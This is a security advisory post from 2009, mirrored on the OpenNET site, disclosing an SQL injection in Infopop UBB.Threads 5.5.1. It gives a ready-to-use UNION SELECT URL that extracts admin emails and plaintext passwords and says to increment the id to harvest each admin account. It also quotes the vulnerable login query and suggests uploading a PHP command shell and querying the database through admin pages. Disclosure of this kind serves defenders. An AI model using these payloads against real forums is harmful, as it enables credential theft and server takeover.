The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Infopop UBB.Threads Admin Credentials via SQL Injection


<< Previous INDEX Search src / Print Next >>
Date: Fri, 13 Mar 2009 12:43:42 -0600
From: [email protected]
To: [email protected]
Subject: Infopop UBB.Threads Admin Credentials via SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

Discovered: 07-18-08
By: SecureState R&D Team (sasquatch)
www.securestate.com


Background:
SQL injection has previously been discovered (http://www.securityfocus.com/bid/14052/)


New Details:
UBBThreads is nice enough to encrypt/mask the regular users' passwords in the database, but stores the admin users' passwords plaintext!


Vulnerable Versions:
Tested on version 5.5.1, others may be vulnerable


Admin Login SQL Injection
http://www.website.com/ubbthreads/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,email,password,0,0%20FROM%20admin_users%20WHERE%20id=1/*&status=N&box=received
Email is in From: field of forum post
Password is text body of post
Increment the "id" to obtain each admin's credentials (1, 2, 3, etc.)


Admin login:
http://www.website.com/Admin/login.php
$query = "SELECT * FROM admin_users WHERE email = '$email' AND password = '$password'";


Other Avenues for Attack:
Turn on file attachments via /ubbthreads/admin/editconfig.php?Cat= and then upload a php command shell as an attachment to a post ;)
Query MySQL database via /ubbthreads/admin/dbcommand.php?Cat=
Get MySQL username/password (it is plaintext) - view HTML Source of /ubbthreads/admin/editconfig.php?Cat=  


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру